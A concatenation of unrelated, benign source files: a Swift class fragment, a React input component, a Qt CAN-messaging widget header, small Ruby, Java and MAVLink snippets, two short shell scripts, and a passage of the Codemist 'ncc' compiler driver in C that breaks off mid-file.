    var playTime: Int
    var title: String
    var upTime: String
    var isShow: Bool

    init(contextType: String, downTime: String, playTime: Int, title: String, upTime: String, isShow: Bool) {
        self.contextType = contextType
        self.downTime = downTime
        self.playTime = playTime
        self.title = title
        self.upTime = upTime
        self.isShow = isShow
    }

    /// Marks the show as currently on air.
    func startShow() {
        isShow = true
    }

    /// Marks the show as off air.
    func endShow() {
        isShow = false
    }

    /// Prints all fields, one per line, in a fixed order.
    func displayDetails() {
        print("Title: \(title)")
        print("Context Type: \(contextType)")
        print("Downtime: \(downTime)")
        print("Uptime: \(upTime)")
        print("Playtime: \(playTime) minutes")
        print("Currently Showing: \(isShow ? "Yes" : "No")")
    }
}
// Example usage: build a show, then print its details before and after
// toggling the on-air flag.
let show = ShowDetails(contextType: "Drama", downTime: "8:00 PM", playTime: 60, title: "The Crown", upTime: "9:00 PM", isShow: false)
show.displayDetails()
show.startShow()
show.displayDetails()
show.endShow()
show.displayDetails() |
import { css } from '@emotion/css'
import * as React from 'react'
// Emotion-scoped styles for the Input component: the wrapper is positioned
// relatively and `.input__field` implements hover / focus / disabled /
// invalid states via borders and outlines.  The CSS lives inside a runtime
// template literal, so all commentary stays out here.
const style = css`
  position: relative;
  .input__field {
    font-size: var(--font-size-xsmall);
    font-weight: var(--font-weight-normal);
    letter-spacing: var( --font-letter-spacing-neg-xsmall);
    line-height: var(--line-height);
    position: relative;
    display: flex;
    overflow: visible;
    align-items: center;
    width: 100%;
    height: 30px;
    margin: 1px 0 1px 0;
    padding: var(--size-xxsmall) var(--size-xxxsmall) var(--size-xxsmall) var(--size-xxsmall);
    color: var(--black8);
    border: 1px solid transparent;
    border-radius: var(--border-radius-small);
    outline: none;
    background-color: var(--white);
    &:hover, &:placeholder-shown:hover {
      color: var(--black8);
      border: 1px solid var(--black1);
      background-image: none;
    }
    &::placeholder {
      color: var(--black6);
      border: 1px solid transparent;
    }
    &:placeholder-shown {
      border: 1px solid var(--black1);
    }
    &:focus:placeholder-shown {
      border: 1px solid var(--blue);
      outline: 1px solid var(--blue);
      outline-offset: -2px;
    }
    &:disabled:hover {
      border: 1px solid transparent;
    }
    &:active, &:focus {
      color: var(--black);
      border: 1px solid var(--blue);
      outline: 1px solid var(--blue);
      outline-offset: -2px;
    }
    &:disabled {
      position: relative;
      color: var(--black6);
      user-select: none;
    }
    &:disabled:active {
      outline: none;
    }
    &:invalid {
      border: 1px solid var(--red);
      outline: 1px solid var(--red);
      outline-offset: -2px;
    }
  }
  .input--borders {
    border: 1px solid var(--black1);
  }
`
/** Props accepted by the Input component below. */
type props = {
  /** Native input type; restricted to the three variants supported here. */
  type: 'text' | 'password' | 'number';
  /** Extra class applied to both the wrapper div and the inner field. */
  className?: string;
  placeholder: string;
  /** Initial value for uncontrolled usage. */
  defaultValue?: any;
  /** Current value for controlled usage. */
  value?: any;
  isDisabled?: boolean;
  required?: boolean;
  /** Forwarded to the native `pattern` validation attribute. */
  pattern?: string;
  /** Called with the raw string value first, then the originating event. */
  onChange?: (
    value: string,
    event: React.ChangeEvent<HTMLInputElement>
  ) => void;
}
export const Input = ({
className = '',
defaultValue,
type,
value,
placeholder,
isDisabled,
onChange,
required,
pattern
}: props) => {
return (
<div className={`${style} input ${className || ''}`}>
<input
type={type}
className={`input__field ${className || ''}`}
placeholder={placeholder}
defaultValue={defaultValue}
value={value}
disabled={isDisabled}
required={required}
pattern={pattern}
onChange={(event) => onChange && onChange(event.target.value, event)}
/>
</div>
)
}
|
#ifndef SENDMESSAGEWIDGET_H
#define SENDMESSAGEWIDGET_H
#include "base/titletableviewwidget.h"
#include "send/txmessagetablemodel.h"
#include "send/checkedbuttondelegate.h"
#include <dbc4cpp/parser.h>
#include <QPushButton>
#include <QList>
#include <QComboBox>
#include <QLineEdit>
#include <QSortFilterProxyModel>
#define SEND_MESSAGE_TABLE_VIEW_FILTER_ENABLED 1
/*
 * Table-based widget for transmitting CAN messages.  Builds on
 * TitleTableViewWidget and drives a TxMessageTableModel; rows can be sent
 * individually (sendButtonClicked) or cyclically en masse
 * (onToggleAllCyclicButton).  An optional filter UI is compiled in via
 * SEND_MESSAGE_TABLE_VIEW_FILTER_ENABLED.
 */
class SendMessageWidget : public TitleTableViewWidget
{
    Q_OBJECT
public:
    explicit SendMessageWidget(QWidget *parent = nullptr);
    ~SendMessageWidget();

    // Recompute the widget's size policy (e.g. after content changes).
    void resetSizePolicy();

public slots:
    // Replace the table contents from a parsed DBC document and its messages.
    void resetContent(Document *doc, QList<Message*> msgList);
    // Handle a click on the per-row send button at (row, col).
    void sendButtonClicked(int row, int col);
    // Track selection changes in the table view.
    void currentChanged(const QModelIndex &current, const QModelIndex &previous);
    // Refresh the row showing `msg` after its data changed.
    void updateMessageData(Message *msg);
    // Start/stop cyclic transmission for all rows at once.
    void onToggleAllCyclicButton(bool checked);
#if SEND_MESSAGE_TABLE_VIEW_FILTER_ENABLED
    void filterTextChanged(QString text);
    void filterColumnChanged(int index);
#endif

signals:
    // Emitted so observers can refresh the view of the message just sent.
    void refreshCurrMessage(Message *msg, CAN_OBJ *obj);

protected:
    void initTitle();
    void initModel();
    void initTableView();
    void initCan();
    void initToolButtons();
#if SEND_MESSAGE_TABLE_VIEW_FILTER_ENABLED
    // Adds the filter column combo and text edit into the tool-button row.
    void initFilter(QHBoxLayout *toolButtonsLayout);
#endif

private:
    // Enable/disable transmission of the message with the given CAN id.
    void enableSendMessage(int msgId, bool enabled);
    int maxWidth = -1;

protected:
    TxMessageTableModel *model = nullptr;
    QPushButton *enableAllCyclicButton;
#if SEND_MESSAGE_TABLE_VIEW_FILTER_ENABLED
    QComboBox *filterColumnCombo = nullptr;
    QLineEdit *filterTextEdit = nullptr;
    QSortFilterProxyModel *proxyModel = nullptr;
#endif
    CheckedButtonDelegate *checkedItemDelegate;
    QPushButton *resizeColumnsButton;
};
#endif // SENDMESSAGEWIDGET_H
|
# Returns the elements of +array+ with duplicates removed, preserving the
# order of first appearance.  The previous hand-rolled hash-keys approach is
# exactly what Array#uniq does (same eql?/hash semantics, same ordering).
def duplicate_remover(array)
  array.uniq
end
<reponame>GeorgeMe/java-design-patterns<filename>producer-consumer/src/main/java/com/iluwatar/producer/consumer/Producer.java
package com.iluwatar.producer.consumer;
import java.util.Random;
/**
 * Class responsible for producing unit of work that can be expressed as {@link Item} and submitted
 * to queue
 */
public class Producer {

  /** Exclusive upper bound, in milliseconds, of the pause after each item. */
  private static final int MAX_DELAY_MS = 2000;

  /** Reused across calls; previously a new Random was allocated per produce(). */
  private final Random random = new Random();

  private final ItemQueue queue;

  private final String name;

  /** Monotonically increasing id stamped onto each produced item. */
  private int itemId = 0;

  public Producer(String name, ItemQueue queue) {
    this.name = name;
    this.queue = queue;
  }

  /**
   * Creates the next {@link Item}, submits it to the queue, then sleeps for a
   * random interval below {@link #MAX_DELAY_MS} to simulate work.
   *
   * @throws InterruptedException if interrupted while submitting or sleeping
   */
  public void produce() throws InterruptedException {
    Item item = new Item(name, itemId++);
    queue.put(item);
    Thread.sleep(random.nextInt(MAX_DELAY_MS));
  }
}
|
<gh_stars>10-100
package io.dronefleet.mavlink.ardupilotmega;
import io.dronefleet.mavlink.annotations.MavlinkEntryInfo;
import io.dronefleet.mavlink.annotations.MavlinkEnum;
/**
 * Outcome of a GoPro write request, keyed by the MAVLink wire values
 * declared in the entry annotations.
 */
@MavlinkEnum
public enum GoproRequestStatus {
    /**
     * The write message with ID indicated succeeded.
     */
    @MavlinkEntryInfo(0)
    GOPRO_REQUEST_SUCCESS,

    /**
     * The write message with ID indicated failed.
     */
    @MavlinkEntryInfo(1)
    GOPRO_REQUEST_FAILED
}
|
#!/bin/bash
# Scroll previous output off-screen by printing 40 blank lines, then start
# the application with its JSON configuration.
for _ in $(seq 1 40); do
    echo ""
done

cargo run config.json
|
#!/bin/bash
# Run inference for target 1ctfA with the alignment (.a3m) as input.
# NOTE(review): presumably 1ctfA.pkl is the output path — confirm against
# run_inference.py's argument handling.
../run_inference.py 1ctfA.a3m 1ctfA.pkl
|
<reponame>stardot/ncc
/*
* driver.c - driver for Codemist compiler (RISC OS, DOS, Mac/MPW, Unix)
* Copyright (C) Acorn Computers Ltd., 1988-1990.
* Copyright (C) Codemist Ltd., 1988-1992.
* Copyright (C) Advanced RISC Machines Limited, 1990-1992.
* SPDX-Licence-Identifier: Apache-2.0
*/
/*
* RCS $Revision$ Codemist 186
* Checkin $Date$
* Revising $Author$
*/
/* AM memo: we should look at a getenv() variable to find alternative */
/* path names to /usr/include etc: This would greatly facilitate */
/* installing as an alternative C compiler and reduce the shambles */
/* (which is being tidied) in env = 2; below. */
/* AM notes that DEC's version of MIPS C compiler uses env variables */
/* COMP_HOST_ROOT and COMP_TARGET_ROOT for this. */
/* AM, Jul 89: COMPILING and TARGET flag tests have been reviewed. */
/* The effect is than running a RISCOS compiler on UNIX looks like a */
/* unix compiler (i.e. -S not -s) except for target-specific flags. */
/* Beware the TARGET_IS_HELIOS flags as not rationalised. */
/* AM: This file should more properly be called unixdriv.c: the */
/* rationale is that it munges the command line and repeatedly calls */
/* the compiler and possibly the linker just like the unix 'cc' cmd. */
/* It is target-independent, but rather host dependent. Accordingly */
/* it needs not to be used on machines like the ibm370 under MVS etc., */
/* where the file munging done is totally inappropriate. */
/* We need a HOST_ or COMPILING_ON_ test whether to include this file. */
/* Further, we would like to suppress the LINK option unless the */
/* host and target are have compatible object format. */
/* Host dependencies:
1. use of getenv("c$libroot").
2. file name munging.
3. The HELP text in drivhelp.h
More?
*/
#include <stddef.h>
#ifdef __STDC__
# include <stdlib.h>
# include <string.h>
#else
# include <strings.h>
extern void exit();
extern char *getenv();
extern int system();
#endif
#include <ctype.h>
#include <stdio.h>
#define uint HIDE_HPs_uint
#include <signal.h>
#undef uint
#include <setjmp.h>
#include "globals.h"
#include "errors.h"
#include "compiler.h"
#include "store.h"
#include "fname.h"
#include "version.h"
#include "drivhelp.h"
#include "mcdep.h"
#include "prgname.h"
#include "pp.h"
#ifdef FOR_ACORN
#include "dde.h"
#endif
#include "toolenv2.h"
#include "tooledit.h"
#include "toolbox.h"
#include "toolver.h"
#include "trackfil.h"
BackChatHandler backchat;
static jmp_buf exitbuf;
/*************************************************************/
/* */
/* Set up default compilation options (Arthur,Msdos,Unix) */
/* */
/*************************************************************/
/* The meaning of the bits in the user's number n in '-On' */
#define MINO_CSE 0x1
#define MINO_NAO 0x2
#define MINO_MAX 0x3 /* sum of above */
#define SMALL_COMMAND 128
#define INCLUDE_BUFLEN 64 /* initial size of include buffer */
#define MAX_TEXT 256 /* The longest filename I can handle */
/* #define BSD_CC "/usr/ucb/cc" */
#define KEY_NEXT 1L
#define KEY_HOST_LIB 0x0000002L
#define KEY_HELP 0x0000004L
#define KEY_LINK 0x0000008L
#define KEY_LISTING 0x0000010L
#define KEY_PCC 0x0000020L
#define KEY_CONFIG 0x0000040L
#define KEY_COMMENT 0x0000080L
#define KEY_ASM_OUT 0x0000100L
#define KEY_XPROFILE 0x0000200L
#define KEY_MAKEFILE 0x0000400L
#define KEY_PREPROCESS 0x0000800L
#define KEY_PROFILE 0x0001000L
#define KEY_RENAME 0x0002000L
#define KEY_MD 0x0008000L
#define KEY_READONLY 0x0010000L
#define KEY_STDIN 0x0020000L
#define KEY_COUNTS 0x0040000L
#ifdef RISCiX113 /* LDS 31-July-92 @@@ */
# define KEY_RIX120 0x0080000L /* Sad history; retire soon? */
# define KEY_NOSYSINCLUDES 0x0000000L /* Avoid spurious #ifdef RISCiX113 */
#else
# define KEY_NOSYSINCLUDES 0x0080000L
#endif
#define KEY_ERRORSTREAM 0x00400000L
#define KEY_VIAFILE 0x00800000L
#define KEY_VERIFY 0x01000000L
# define KEY_CFRONT 0x02000000L
#define KEY_DEBUG 0x08000000L
#ifndef FORTRAN
/* IDJ 25-Mar-94: re-use FORTRAN flags for DDE purposes */
#define KEY_THROWBACK 0x10000000L
#define KEY_DESKTOP 0x20000000L
#define KEY_DEPEND 0x40000000L
#define KEY_CFRONTPREPROCESS 0x80000000L
#else
#define KEY_F66 0x10000000L
#define KEY_ONETRIP 0x20000000L
#define KEY_UPPER 0x40000000L
#define KEY_LONGLINES 0x80000000L
/* The following are duplicated from ffe/feint.h. This is a temporary bodge. */
#define EXT_DOUBLECOMPLEX 1L
#define EXT_HINTEGER 2L
#define EXT_CASEFOLD 4L
#define EXT_LCKEYWORDS 8L
#define EXT_LCIDS 0x10L
#define EXT_FREEFORMAT 0x20L
#define EXT_IMPUNDEFINED 0x40L
#define EXT_RECURSION 0x80L
#define EXT_AUTO 0x100L
#define EXT_HOLLERITH 0x200L
#define EXT_TOPEXPRESS 0x400L
#define EXT_F66 0x800L
#define EXT_MIXEDCOMM 0x1000L
#define EXT_VMSCHARS 0x2000L
#define EXT_VMSCASTS 0x4000L
#define EXT_VMSIO 0x8000L
#define EXT_VMSTYPES 0x10000L
#define OPT_STATICLOCALS 0x100000L
#define OPT_DEFHINTEGER 0x200000L
#define OPT_DEFDOUBLE 0x400000L
#define OPT_IMPUNDEFINED 0x800000L
#define OPT_CHECKSUB 0x1000000L
#define OPT_NOARGALIAS 0x2000000L
#define OPT_LONGLINES 0x4000000L
#define FFEOPTS 0xfff00000L
#define F66_ONETRIP 1L
#define F66_IOSUBLIST 2L
#define F66_INTRINSGO 4L
#endif /* FORTRAN */
/*************************************************************/
/* */
/* Define the environment information structure */
/* */
/*************************************************************/
#ifdef FORTRAN
# define RISCIX_FORTRAN_PRAGMAX \
(EXT_DOUBLECOMPLEX | EXT_HINTEGER | EXT_CASEFOLD | EXT_LCKEYWORDS |\
EXT_FREEFORMAT | EXT_IMPUNDEFINED | EXT_RECURSION | EXT_AUTO |\
EXT_HOLLERITH | EXT_TOPEXPRESS | EXT_F66 | EXT_MIXEDCOMM |\
EXT_VMSCHARS | EXT_VMSCASTS | EXT_VMSIO | EXT_VMSTYPES |\
OPT_STATICLOCALS | OPT_NOARGALIAS)
#endif
static char *driver_options[] = DRIVER_OPTIONS;
/* Per-host/target driver configuration: default flags, include and library
 * search roots, the external assembler/linker commands, and the start-up
 * objects and libraries used when linking.  Initialised from initSetupenv
 * (below) and then patched from environment variables by
 * get_external_environment(). */
static struct EnvTable
{
    int unused;
    int32 initial_flags;            /* default KEY_* driver flags            */
    int32 initial_pragmax;
    const char *include_ansi_path,
               *include_pcc_path,
               *include_pas_path;
    const char *lib_dir;            /* host directory separator              */
    char *lib_root, *pas_lib_root;
    const char *list;               /* listing-file extension                */
    const char *assembler_cmd;
    const char *link_cmd;
/* 'output_file' is also used for non-link outputs. */
/* This unix convenience just causes pain here. */
    char *output_file;
    const char *link_ext;
    const char *link_startup,
               *profile_startup,
               *profile_g_startup;
    const char *default_lib,
               *host_lib,
               *profile_lib,
               *fort_lib,
               *fort_profile_lib,
               *pas_lib;
}
const initSetupenv =
#ifdef DRIVER_ENV
DRIVER_ENV
#else
# ifdef COMPILING_ON_ARM
# ifdef COMPILING_ON_RISC_OS
# ifdef FOR_ACORN
{
/*/* IDJ hack: 06-Jun-94 to make it work for DDE. Needs sorting out! */
0, (KEY_LINK), 0,
/* /* Perhaps $.clib, $.plib etc should be called $.lib */
"$.clib", "$.clib", "$.plib", "", "$.clib.", "$.plib", "l",
"ObjAsm -quit -stamp",
"CHAIN:link", NULL, "",
"", "", "",
"o.stubs", "o.hostlib", "o.ansilib", "o.fortlib", "o.fortlib", "o.plib"
}
# else
{
0, (KEY_LINK), 0,
/* /* Perhaps $.clib, $.plib etc should be called $.lib */
"$.clib", "$.clib", "$.plib", ".", "$.clib", "$.plib", "l",
"ObjAsm",
"CHAIN:link", NULL, "",
"", "", "",
"o.ansilib", "o.hostlib", "o.ansilib", "o.fortlib", "o.fortlib", "o.plib"
}
# endif
# endif
# ifdef COMPILING_ON_UNIX
{
# ifdef FORTRAN
0, (KEY_LINK), RISCIX_FORTRAN_PRAGMAX,
# else
0, (KEY_PCC | KEY_LINK), 0,
# endif
# ifdef RISCiX113
"/usr/include/ansi",
# else
"/usr/include",
# endif
"/usr/include", "/usr/include/iso", "/", "", "", "lst",
"as",
"/usr/bin/ld", "a.out", "",
# ifdef RISCiX113
"/lib/crt0.o", "/lib/mcrt0.o", "/lib/gcrt0.o",
# else
"/usr/lib/crt0.o", "/usr/lib/mcrt0.o", "/usr/lib/gcrt0.o",
# endif
"-lc", "", "-lc_p",
# ifdef FORTRAN_NCLIB
"-lnfc", "-lnfc_p",
# else
"-lF66,-lF77,-lI77,-lU77,-lm", "-lF66_p,-lF77_p,-lI77_p,-lU77_p,-lm_p",
# endif
"-lpc"
}
# endif /* COMPILING_ON_UNIX */
# else /* COMPILING_ON_ARM */
# ifdef COMPILING_ON_MSDOS /* Zortech / WatCom / VC++ on MSDOS */
{
0, (KEY_LINK), 0,
"\\arm\\lib", "\\arm\\lib", "", "\\", "\\arm\\lib", "", "lst",
"armasm",
"armlink", NULL, "",
"", "", "",
"armlib.o", "hostlib.o", "armlib.o", "", "", ""
}
# else
# ifdef COMPILING_ON_MACINTOSH
/* arm_targetted cross_compilation : fortran & pascal not supported */
/* no default places (no root without knowing volume name) */
{
#ifndef HOST_CANNOT_INVOKE_LINKER
0, (KEY_LINK), 0,
#else
0, 0, 0,
#endif
"", "", "", ":", "", "", "lst",
"armasm",
"armlink", NULL, "",
"", "", "",
"armlib.o", "hostlib.o", "armlib.o", "", "", ""
}
# else
# ifdef TARGET_IS_ARM
/* arm_targetted cross_compilation : fortran & pascal not supported */
{ 0, KEY_LINK, 0,
"/usr/local/lib/arm", "/usr/local/lib/arm", "", "/", "/usr/local/lib/arm", "", "lst",
"armasm",
"armlink", NULL, "",
"", "", "",
"armlib.o", "hostlib.o", "armlib.o", "", "", ""
}
# else
# error "No proper DRIVER_ENV information"
# endif /* TARGET_IS_ARM */
# endif /* COMPILING_ON_MACINTOSH */
# endif /* COMPILING_ON_MSDOS */
# endif /* COMPILING_ON_ARM */
#endif /* DRIVER_ENV */
;
static struct EnvTable setupenv;
char const Tool_Name[] = TOOLFILENAME;
#ifdef COMPLING_ON_UNIX
# define Compiling_On_Unix 1
#else
# define Compiling_On_Unix 0
#endif
#if defined(PASCAL)
# define LanguageIsPascal 1
# define LanguageIsFortran 0
#elif defined(FORTRAN)
# define LanguageIsPascal 0
# define LanguageIsFortran 1
#else
# define LanguageIsPascal 0
# define LanguageIsFortran 0
#endif
typedef struct { char const **v; Uint sz; Uint n; } ArgV;
static ArgV cc_arg, cc_fil;
static ArgV ld_arg, ld_fil;
static int cmd_error_count, main_error_count;
static int32 driver_flags;
#ifdef FORTRAN
static int32 pragmax_flags;
#endif
#ifdef HOST_OBJECT_INCLUDES_SOURCE_EXTN
# define OBJ_EXTN LANG_EXTN_STRING ".o"
# define ASM_EXTN LANG_EXTN_STRING ".s"
#else
#ifndef OBJ_EXTN
# define OBJ_EXTN "o"
#endif
#ifndef ASM_EXTN
# define ASM_EXTN "s"
#endif
#endif
/* Status recorded for the setjmp(exitbuf) site to pick up after the jump. */
static int compiler_exit_status;

/* Terminate the current compilation: record 'status', release per-run
 * resources (message catalogue, tracked files, allocator), restore the
 * default SIGTERM handler where one was installed, close the error stream
 * if open, and longjmp back to the driver's setjmp(exitbuf) instead of
 * calling exit(). */
void compiler_exit(int status)
{   compiler_exit_status = status;
#ifdef NLS
    msg_close(NULL);
#endif
    trackfile_finalise();
    alloc_finalise();
#ifdef COMPILING_ON_MSDOS
    (void) signal(SIGTERM, SIG_DFL);
#endif
    if (errors != NULL) fclose(errors);
    longjmp(exitbuf, 1);
}
/*
 * Concatenate 'root', 'dir' and 'name' into permanently allocated storage.
 * When either 'root' or 'name' is empty, 'name' is returned unchanged and
 * nothing is allocated.
 */
static const char *join_path(const char *root, const char *dir,
                             const char *name)
{
    size_t rootlen, dirlen, namelen;
    char *joined;

    if (root[0] == '\0' || name[0] == '\0')
        return name;

    rootlen = strlen(root);
    dirlen = strlen(dir);
    namelen = strlen(name);
    joined = (char *)PermAlloc((int32)rootlen + (int32)dirlen + (int32)namelen + 1);
    memcpy(joined, root, rootlen);
    memcpy(joined + rootlen, dir, dirlen);
    memcpy(joined + rootlen + dirlen, name, namelen + 1);   /* +1 copies NUL */
    return joined;
}
#define modifiablecopy(s) join_strs(s, "")
#define PermString(s) modifiablecopy(s)
static char *join_strs(const char *s1, const char *s2)
{
size_t s1len = strlen(s1),
s2len = strlen(s2);
char *s = (char *)PermAlloc((int32)s1len + (int32)s2len + 1);
memcpy(s, s1, s1len);
memcpy(s+s1len, s2, s2len+1);
return s;
}
/* Append 'arg' to the argument vector 'p', doubling the backing array when
 * full.  The old array is abandoned to the permanent allocator rather than
 * freed.  NOTE(review): a p->sz of 0 would never grow (2*0 == 0) — assumes
 * the vector is always initialised with a non-zero size; confirm at the
 * initialisation site. */
static void AddArg(ArgV *p, char const *arg)
{
    if (p->n >= p->sz) {
        void *newv = PermAlloc(sizeof(char **) * 2 * p->sz);
        memcpy(newv, p->v, p->sz * sizeof(char **));
        p->v = (char const **)newv;
        p->sz *= 2;
    }
    p->v[p->n++] = arg;
}
/* Render the decomposed file name 'unparse' into freshly allocated text.
 * With extn == NULL the name is reproduced as-is; with a non-empty extn the
 * extension is replaced and (unless objects keep their source extension)
 * any volume/path prefix is stripped first.  Aborts the driver on an
 * internal fname_unparse failure. */
static char *copy_unparse(UnparsedName *unparse, const char *extn)
{   char *new_name;
    size_t n;
    UnparsedName u;
    /* A NULL extn means use the UnparsedName as-is. A non-NULL extn means */
    /* use the extn given and kill any leading path segment. In this case  */
    /* we modify a local copy of the UnparsedName rather than unparse.     */
    if (extn)
    {   u = *unparse;
        u.elen = strlen(extn);
        if (u.elen == 0) extn = NULL;   /* an empty extension behaves like none */
        u.extn = extn;
#ifndef HOST_OBJECT_INCLUDES_SOURCE_EXTN
        u.path = NULL;
        u.plen = 0;
        u.vol = NULL;
        u.vlen = 0;
        u.type &= ~FNAME_ROOTED;
#endif
        unparse = &u;
    }
    /* Allocate space for the returned copy of the name. Allow some spare  */
    /* for ^ -> .. (several times) + up to 2 extra path separators + a NUL. */
    n = unparse->vlen + unparse->plen + unparse->rlen + unparse->elen + 10;
    new_name = (char *)PermAlloc(n);
    if (fname_unparse(unparse, FNAME_AS_NAME, new_name, n) < 0)
        driver_abort("internal fault in \"copy_unparse\""); /* @@@ syserr? */
    return new_name;
}
/*
 * Return the value of environment variable 'var' as a modifiable copy,
 * or 'ifnull' when 'var' is NULL or unset.  On Unix hosts the value's
 * ':' path separators are rewritten to ',' (the driver's internal form).
 */
static char *pathfromenv(char *var, char *ifnull)
{
    char *val;

    if (var == NULL || (val = getenv(var)) == NULL)
        return ifnull;

    val = modifiablecopy(val);
    if (Compiling_On_Unix)
    {   char *p;
        for (p = val; *p != 0; p++)
            if (*p == ':') *p = ',';
    }
    return val;
}
#ifndef C_INC_VAR
# ifdef COMPILING_ON_RISC_OS
# define C_INC_VAR "c$libroot"
# define C_LIB_VAR "c$libroot"
# define P_INC_VAR "p$libroot"
# define P_LIB_VAR "p$libroot"
# else
# if defined(COMPILING_ON_UNIX) && defined(RELEASE_VSN)
# define C_INC_VAR NULL
# define C_LIB_VAR NULL
# define P_INC_VAR NULL
# define P_LIB_VAR NULL
# else
# define C_INC_VAR "NCC_INCLUDE_PATH"
# define C_LIB_VAR "NCC_LIBRARY_PATH"
# define P_INC_VAR "NPC_INCLUDE_PATH"
# define P_LIB_VAR "NPC_LIBRARY_PATH"
# endif
# endif
#endif
/* Initialise setupenv from the compiled-in defaults (initSetupenv) and then
 * override the include and library roots from the C_INC_VAR / C_LIB_VAR
 * environment variables (plus the Pascal equivalents when built as a Pascal
 * compiler).  All configured library/startup file names are re-rooted under
 * the library root via lib_fixupname. */
static void get_external_environment(void)
{
    char *root = pathfromenv(C_INC_VAR, "");
    setupenv = initSetupenv;
    if (root[0] != 0)
        setupenv.include_ansi_path = setupenv.include_pcc_path = root;
    root = pathfromenv(C_LIB_VAR, setupenv.lib_root);
    if (root[0] != 0)
    {
/* Moreover the 'isalpha' is essentially a file-is-rooted test.         */
/* similarly 'lib_dir' is just the (host) directory-separator.          */
#define lib_fixupname(path) \
    if (!Compiling_On_Unix || isalpha(path[0])) \
        path = join_path(root, setupenv.lib_dir, path)

        lib_fixupname(setupenv.default_lib);
        lib_fixupname(setupenv.host_lib);
        lib_fixupname(setupenv.profile_lib);
        lib_fixupname(setupenv.fort_lib);
        lib_fixupname(setupenv.fort_profile_lib);
        lib_fixupname(setupenv.link_startup);
        lib_fixupname(setupenv.profile_startup);
        lib_fixupname(setupenv.profile_g_startup);
    }
#ifdef PASCAL
    root = pathfromenv(P_INC_VAR, "");
    if (root[0] != 0)
        setupenv.include_pas_path = root;
    root = pathfromenv(P_LIB_VAR, setupenv.pas_lib_root);
    if (root[0] != 0)
    {   lib_fixupname(setupenv.pas_lib);
    }
#endif
}
/* One (name, value) pair as yielded by toolenv enumeration. */
typedef struct {
    char const *name;
    char const *val;
} NameVal;

/* State threaded through Tool_OrderedEnvEnumerate's collection pass. */
typedef struct {
    ToolEnv *t;
    ToolEdit_EnumFn *f;
    void *arg;
    char const *prefix;     /* only names with this prefix are collected   */
    size_t prefix_len;      /* 0 means "match everything"                  */
    Uint n;                 /* entries collected so far                    */
    NameVal *matches;
} TE_EnumRec;

/* State for TE_Count's counting pass. */
typedef struct {
    char const *prefix;
    size_t prefix_len;
    Uint n;
} TE_CountRec;
/* toolenv_enumerate callback: count each variable whose name starts with
 * the requested prefix (an empty prefix matches every variable). */
static int TECount_F(void *arg, char const *name, char const *val) {
    TE_CountRec *counter = (TE_CountRec *)arg;
    IGNORE(val);
    if (counter->prefix_len != 0 && !StrnEq(name, counter->prefix, counter->prefix_len))
        return 0;
    counter->n++;
    return 0;
}

/* Count the variables in 't' whose names begin with 'prefix'. */
Uint TE_Count(ToolEnv *t, char const *prefix) {
    TE_CountRec counter;
    counter.prefix = prefix;
    counter.prefix_len = strlen(prefix);
    counter.n = 0;
    toolenv_enumerate(t, TECount_F, &counter);
    return counter.n;
}
/* toolenv_enumerate callback: record every (name, value) pair whose name
 * carries the requested prefix into the matches array. */
static int TE_EnumEnter(void *arg, char const *name, char const *val) {
    TE_EnumRec *rec = (TE_EnumRec *)arg;
    if (rec->prefix_len != 0 && !StrnEq(name, rec->prefix, rec->prefix_len))
        return 0;
    rec->matches[rec->n].name = name;
    rec->matches[rec->n].val = val;
    rec->n++;
    return 0;
}
static int CFNameVal(void const *a, void const *b) {
NameVal const *ap = (NameVal const *)a;
NameVal const *bp = (NameVal const *)b;
uint32 an = strtoul(&ap->name[3], NULL, 16),
bn = strtoul(&bp->name[3], NULL, 16);
return an < bn ? -1 :
an == bn ? 0 :
1;
}
/*
 * Enumerate the variables in 't' whose names begin with 'prefix', in the
 * numeric order imposed by CFNameVal, calling 'f' for each until it returns
 * non-zero.  Returns the first non-zero callback result, or 0.
 * Fix: the malloc result was previously used unchecked; on failure we now
 * behave as if nothing matched instead of dereferencing NULL in
 * TE_EnumEnter/qsort.
 */
int Tool_OrderedEnvEnumerate(
    ToolEnv *t, char const *prefix, ToolEdit_EnumFn *f, void *arg) {
  Uint n = TE_Count(t, prefix);
  TE_EnumRec tr;
  int rc = 0;
  tr.t = t; tr.f = f; tr.arg = arg;
  tr.prefix = prefix; tr.prefix_len = strlen(prefix);
  if (n != 0) {
    Uint i;
    tr.matches = (NameVal *)malloc(n * sizeof(NameVal));
    if (tr.matches == NULL) return 0;   /* out of memory: no enumeration */
    tr.n = 0;
    toolenv_enumerate(t, TE_EnumEnter, &tr);
    qsort(tr.matches, tr.n, sizeof(NameVal), CFNameVal);
    for (i = 0; i < tr.n; i++) {
      rc = f(arg, tr.matches[i].name, tr.matches[i].val, FALSE);
      if (rc != 0) break;
    }
    free(tr.matches);
  }
  return rc;
}
/* Return the integer value of variable 'name' in 't'; 'def' when the
 * variable is absent or its value does not start with '='.  (Values are
 * stored with a leading '=' byte.) */
Uint TE_Integer(ToolEnv *t, char const *name, Uint def) {
    char const *tval = toolenv_lookup(t, name);
    if (tval == NULL || tval[0] != '=') return def;
    return (Uint)strtoul(&tval[1], NULL, 10);
}
/* True iff variable 'name' exists in 't' with exactly the value 'val'. */
bool TE_HasValue(ToolEnv *t, char const *name, char const *val) {
    char const *current = toolenv_lookup(t, name);
    if (current == NULL) return NO;
    return StrEq(val, current);
}
/*************************************************************/
/* */
/* Find a command line keyword and return flag */
/* */
/*************************************************************/
/* Case-insensitive equality of two whole NUL-terminated strings. */
bool cistreq(const char *s1, const char *s2) {
    int c1, c2;
    do {
        c1 = *s1++;
        c2 = *s2++;
        if (safe_tolower(c1) != safe_tolower(c2)) return NO;
    } while (c1 != 0);
    return YES;
}
/* Case-insensitive equality over at most the first n characters (stops
 * early, and succeeds, if both strings end before n). */
bool cistrneq(const char *s1, const char *s2, size_t n) {
    for (; n > 0; n--) {
        int c1 = *s1++, c2 = *s2++;
        if (safe_tolower(c1) != safe_tolower(c2)) return NO;
        if (c1 == 0) break;
    }
    return YES;
}
/*************************************************************/
/*                                                           */
/*      Add an option to a link or assembler command.        */
/*                                                           */
/*************************************************************/

/*
 * Append 'extra' to the command buffer 'cmd' at offset 'posn', inserting a
 * separating space when both sides are non-empty.  When cmd == NULL no bytes
 * are written and only the resulting length is computed, so callers can run
 * a sizing pass followed by an identical filling pass.  Returns the new
 * offset/length.
 */
static int32 cmd_cat(char *cmd, int32 posn, const char *extra)
{
    size_t extralen = strlen(extra);

    if (posn != 0 && extralen != 0)
    {   if (cmd != NULL)
            cmd[posn] = ' ';
        posn++;
    }
    if (cmd != NULL && extralen != 0)
        memcpy(cmd + posn, extra, extralen + 1);
    return posn + extralen;
}
/*************************************************************/
/* */
